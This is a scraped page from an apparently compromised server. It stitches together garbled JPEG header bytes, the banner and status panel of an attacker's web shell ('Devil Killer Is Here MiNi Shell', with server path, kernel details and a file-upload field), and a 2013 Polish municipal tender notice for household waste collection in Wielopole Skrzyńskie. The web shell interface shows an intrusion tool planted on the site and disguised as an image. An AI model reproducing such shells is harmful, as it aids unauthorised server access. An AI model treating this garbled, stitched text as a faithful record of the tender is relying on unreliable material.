JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130327/120522-N-2013.html

<p class="kh_header"><b>Wielopole Skrzyńskie: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli          nieruchomości  zamieszkałych na terenie gminy Wielopole Skrzyńskie</b><br>
<b>Numer ogłoszenia: 120522 - 2013; data zamieszczenia: 27.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wielopole Skrzyńskie , Wielopole Skrzyńskie 200, 39-110 Wielopole Skrzyńskie, woj. podkarpackie, tel. 0-17 2214819 w. 45, faks 0-17 2214830.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielopole.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli          nieruchomości  zamieszkałych na terenie gminy Wielopole Skrzyńskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na załadunku i transporcie odpadów 
    komunalnych od właścicieli nieruchomości zamieszkałych  na terenie Gminy Wielopole
    Skrzyńskie oraz ich zagospodarowaniu. 
    Przedmiot zamówienia nie obejmuje podmiotów gospodarczych, szkół, itp.
2. Odpady będą odbierane z terenu gminy Wielopole Skrzyńskie, która liczy obecnie 8500
    mieszkańców zamieszkałych stale i czasowo. 
    Orientacyjna liczba nieruchomości z których należy odebrać odpady komunalne - 1790. 
    W skład gminy wchodzi 5 sołectwach : Wielopole Skrzyńskie, Nawsie, Glinik, Broniszów
    i Brzeziny.
    Zbiórka odpadów komunalnych na terenie gminy będzie się odbywać w systemie workowym.
 
          Uwaga: ilości nieruchomości są orientacyjne. Zamawiający zastrzega sobie prawo zmiany 
          ilości punktów odbioru odpadów. Ich ilość w ciągu realizacji zamówienia może ulec zmianie. 
                                                   
3. Zakres przedmiotu zamówienia obejmuje odbiór i zagospodarowanie w okresie objętym 
    zamówieniem:
   3.1  Zmieszanych niesegregowanych odpadów komunalnych  zgromadzonych w  odpowiednio 
    oznakowanych workach z budynków mieszkalnych, wystawionych na trasie odbioru 
    w ilości ok 226,80  ton.
   3.2 Segregowanych odpadów komunalnych, zgromadzonych w odpowiednio oznakowanych
          workach z budynków mieszkalnych, wystawionych na trasie odbioru, w ilości ok. 877,20 ton .
   3.3 Pozostałych odpadów zebranych jednorazowo w łącznej ilości ok. 30,00 ton :
   a) odpadów wielkogabarytowych
   b) zużytych opon
   c) zużytego sprzętu elektrycznego i elektronicznego 
   d) baterie, akumulatory, chemikalia, świetlówki, przeterminowane leki
   e) odpady budowlane i remontowe, które powstały w gospodarstwie domowym w wyniku
        prowadzenia drobnych robót nie wymagających pozwolenia wydanego przez starostę
   3.4 Worki do gromadzenia odpadów posiadać będą następujące kolory:
         a) worek żółty na tworzywa sztuczne
   b) worek zielony na szkło białe i kolorowe
   c) worek czerwony na metal
   d) worek niebieski na papier, tekturę, odzież i tekstylia, opakowania wielomateriałowe 
       ulegające biodegradacji
   e) worek brązowy na odpady kuchenne i odpady ogrodowe
    f) worek czarny na odpady komunalne niesegregowane (zmieszane).
   Worki muszą być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone.  
    3.5 Odpady odbierane z terenu gminy będą gromadzone w workach o poj. 120 l i 60 l.
    3.6 Odbiór odpadów segregowanych i niesegregowanych z terenu gminy Wielopole Skrzyńskie
          odbywał się będzie z częstotliwością:
     a) z terenu zabudowy rolniczej 1 raz w miesiącu, 
     b) z centrum Wielopola Skrzyńskiego w każdy piątek zgodnie z harmonogramem, ustalonym 
        pomiędzy Wykonawcą a Zamawiającym
     Wykonawca będzie zobowiązany w ramach umowy do dystrybucji wśród właścicieli
     nieruchomości harmonogramu odbioru odpadów oraz innych dokumentów związanych 
    z systemem gospodarki odpadami.
     3.7 Odbiór odpadów wymienionych w pkt 3.3, z wyznaczonych miejsc z terenu gminy odbędzie
           się 1 raz w roku w określonym przez Zamawiającego terminie. 
          
     3.8  Podana Ilość odpadów  jest szacunkowa i należy traktować ją orientacyjnie, ponieważ 
            może ona ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego. 
           Wykonawcy nie przysługuje prawo odszkodowania za zwiększenie lub zmniejszenie 
           wskazanych ilości odpadów komunalnych.

     3.9 Trasy zbiórki odpadów zostały  przedstawione na mapie stanowiącej załącznik nr 9
      SIWZ i wynoszą :
      a) Brzeziny             - ok. 44,5  km
      b) Wielopole Skrz. - ok. 24,1  km 
      c) Nawsie               - ok. 17,1  km
      d) Glinik                  - ok. 21,9  km
      e) Broniszów          - ok. 13,4  km
  
   3.10. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamkniecie drogi), gdy nie jest
            możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie
            każdorazowo uzgadniany pomiędzy Zamawiającym i Wykonawcą i może  polegać
            w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez
            właścicieli nieruchomości, oraz innych terminów ich odbioru. W takich przypadkach
            Wykonawcy nie przysługuje dodatkowe wynagrodzenie.

   3.11.Wykonawca zobowiązany jest do utrzymania miejsc po odbiorze odpadów komunalnych
     w należytej czystości (sprzątanie miejsc po zabraniu worków z odpadami w przypadku
      jego zanieczyszczenia).

   3.12. Wykonawca w trakcie realizacji umowy na własny koszt zakupi i dostarczy właścicielom
            nieruchomości worki na odpady segregowane i zmieszane w niezbędnej ilości.
      Wykonawca odbiera od właścicieli nieruchomości zamieszkałych każdą ilość zgromadzonych 
     w odpowiednich workach odpadów. Worki  winny być oznakowane przez właściciela
     nieruchomości (kartka lub napis na worku : nr budynku i miejscowość). 

   3.13. Wykonawca zobowiązany będzie do monitorowania obowiązku ciążącego na właścicielu 
      nieruchomości w zakresie selektywnego zbierania odpadów komunalnych. Wykonawca,
      przed zakwalifikowaniem odpadów segregowanych do zmieszanych , sporządza na tą
            okoliczność dokumentację (np. oświadczenie, notatka, dokumentacja fotograficzną) 
            umożliwiającą wydanie przez Zamawiającego decyzji administracyjnej naliczającej zmianę 
            wysokości opłaty. 
            Z dokumentacji musi jednoznacznie wynikać, jakiej dotyczy nieruchomości, w jakim dniu
            i o jakiej godzinie doszło do ustalenia w/w zdarzenia. Wykaz właścicieli nieruchomości
            wraz dokumentacją poświadczającą nieprawidłową segregację odpadów, Wykonawca 
            przekaże niezwłocznie Zamawiającemu.

   3.14. W ramach zagospodarowania odpadów podmiot odbierający odpady zobowiązany jest do
            przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz
            pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania 
            do regionalnej lub zastępczej regionalnej instalacji do przetwarzania odpadów komunalnych
           właściwej dla regionu centralnego  województwa podkarpackiego zgodnie z uchwałą 
           Nr XXIV/409/12 z dnia 27 sierpnia 2012 r. w sprawie  przyjęcia projektu Planu Gospodarki 
           Odpadami dla Województwa Podkarpackiego i uchwalenia Planu Gospodarki Odpadami 
           dla Województwa Podkarpackiego.  
  
   3.15. W przypadku selektywnie zebranych odpadów komunalnych, w ramach zagospodarowania 
            odpadów, Wykonawca zobowiązany jest do ich przekazywania do instalacji odzysku
            i unieszkodliwiania, zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 7
            ustawy z dnia 27 kwietnia 2001 r. o odpadach. 
   3.16. Wykonawca podczas realizacji zamówienia zapewni w stosunku do faktycznie odebranej
            ilości odpadów, osiągnięcie odpowiednich poziomów recyklingu, przygotowania do
            ponownego użycia i odzysku innymi metodami oraz ograniczenia masy odpadów
            komunalnych ulegających biodegradacji przekazywanych do składowania zgodnie z ustawą
            z dnia 13 września 1996r. o utrzymaniu czystości i porządku.
   3.17.Odbioru odpadów komunalnych przez regionalną lub zastępczą instalację 
           do  zagospodarowania odpadów uwzględnioną z WPGO zapewnia sobie Wykonawca.

   3.18. Wykonawca ponosi całkowitą odpowiedzialność za prawidłowe gospodarowanie odebranymi
            odpadami zgodnie z przepisami obowiązującymi w tym zakresie. Dotyczy to m.in. 
            ewentualnego przeładunku odpadów, transportu odpadów, spraw formalno - prawnych 
            związanych z odbieraniem i dostarczaniem odpadów uprawnionemu przedsiębiorcy 
            prowadzącemu działalność w zakresie odzysku lub unieszkodliwiania odpadów
            komunalnych.

  3.19  Wykonawca jest zobowiązany do spełnienia wszystkich wymagań z art. 9d ustawy 
           o utrzymaniu czystości porządku w gminach a w szczególności spełniać wymagania
           określone w Rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013(Dz.U.2013,poz.122) 
           w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych 
           od właścicieli nieruchomości.
  3.20. Wykonawca będzie zobowiązany do dostarczenia Zamawiającemu w wersji papierowej 
           i elektronicznej sprawozdań o jakich mowa w art.9n ustawy z dnia 13 września o utrzymaniu
           czystości i porządku w gminach.
  3.21. W celu umożliwienia sporządzenia przez Zamawiającego rocznego sprawozdania 
           z realizacji zadań z zakresu gospodarowania odpadami komunalnymi, o którym mowa w art.9q 
           w/w ustawy, Wykonawca zobowiązany będzie przekazać Zamawiającemu niezbędne informacje
           umożliwiające sporządzenie sprawozdania w posiadaniu których będzie Wykonawca. 

  3.22. Wykonawca zobowiązany jest do spełniania przez cały okres wykonywania usługi wszystkich 
          wymogów wynikających z obowiązujących przepisów, dotyczących odbierania 
          i zagospodarowania odpadów komunalnych.

  3.23. Wykonawca będzie przedkładał Zamawiającemu wraz z fakturą za dany okres rozliczeniowy
          karty przekazania odpadów segregowanych i niesegregowanych .

  3.24.Wykonawca odbiera odpady z terenu gminy z nieruchomości zamieszkałych.
          Nie dopuszcza się zbierania  - dopełniania pojazdu odpadami z terenu innej gminy lub 
           z nieruchomości niezamieszkałych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.07.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 2000,00 zł, słownie: 
    dwa tysiące złotych.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
   1) w pieniądzu, przelewem na rachunek bankowy: 
     BS Wielopole Skrzyńskie   Nr 88 9173 0002 0000 0273 2000 0020 z adnotacją wadium - Odbiór i zagospodarowanie  odpadów  komunalnych od właścicieli nieruchomości zamieszkałych na  terenie  Gminy Wielopole Skrzyńskie 
   2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej,z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
   3)  w gwarancjach bankowych, 
   4)  w gwarancjach ubezpieczeniowych 
   5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczo ści (Dz. U. z 2007 r. Nr 42,  po z. 275)  
   6) termin wniesienia wadium: wadium należy wnieść przed upływem terminu składania ofert. 
     Wykonawca jest zobowiązany do dołączenia do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu.  
   7) w przypadku wniesienia wadium w innej formie niż w pieniądzu, Wykonawca jest zobowiązany oryginał wadium umieścić osobno w kopercie, jako załącznik do opakowania , w którym składa się ofertę, natomiast kserokopię dokumentu poświadczonego za zgodność z oryginałem załączyć do oferty.
4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na  rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,( w szczególności winni posiadać wpis do Rejestru działalności regulowanej prowadzonego przez Wójta Gminy Wielopole Skrzyńskie)  tj. przedstawią oświadczenie o spełnieniu warunków udziału w postępowaniu, o którym mowa w art. 22 ust.1 ustawy.
Zamawiający dokona oceny spełnienia przez Wykonawców w.w warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia, tj. Wykonawcy muszą wykazać, że wykonywali usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie z podaniem ilości odebranych odpadów, przedmiotu, dat wykonania oraz potwierdzeniem, że usługi te zostały lub są wykonywane należycie.
Zamawiający dokona oceny spełnienia przez Wykonawców w.w warunków na podstawie 
     załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania odpowiednim potencjałem technicznym, tj., że na czas realizacji zamówienia będzie dysponował narzędziami, wyposażeniem zakładu i urządzeniami technicznymi zgodnie z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 (Dz.U.2013,poz.122) w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wydanym na podstawie art. 9d ust.2 ustawy o utrzymaniu czystości i porządku w gminach.
Zamawiający dokona oceny spełnienia przez Wykonawców w.w warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien przedłożyć oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wiedzę i doświadczenie oraz wszelkie ustawowo wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Sytuacji ekonomicznej i finansowej, tj., że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 złotych.
Zamawiający dokona oceny spełnienia przez Wykonawców w.w warunków na podstawie załączonych dokumentów i oświadczeń, o których mowa w rozdziale VI SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość wprowadzenia zmian postanowień umowy dotyczących:
1. Zmiany wysokości wynagrodzenia Wykonawcy na skutek zmiany obowiązującej stawki podatku VAT.
2. Zmiany przedstawiciela Zamawiającego, zmiany osoby odpowiedzialnej za realizację przedmiotu zamówienia po stronie Wykonawcy.
3. Zmiany z danych osobowych oraz rachunku bankowego.
4. Zmiany ilości (zmniejszenie lub zwiększenie) odpadów objętych umową, które zostały podane orientacyjnie. 

5. Cena jednostkowa wywozu 1 t odpadów segregowanych i niesegregowanych oraz pozostałych odpadów zebranych jednorazowo pozostaje niezmienna przez okres realizacji umowy.

Każda zmiana niniejszej Umowy wymaga formy pisemnego aneksu  pod rygorem nieważności. Niedopuszczalne są jednak, pod rygorem nieważności, zmiany postanowień zawartej Umowy oraz wprowadzenie nowych postanowień do umowy, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu oraz określił warunki takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wielopole.eu<br>
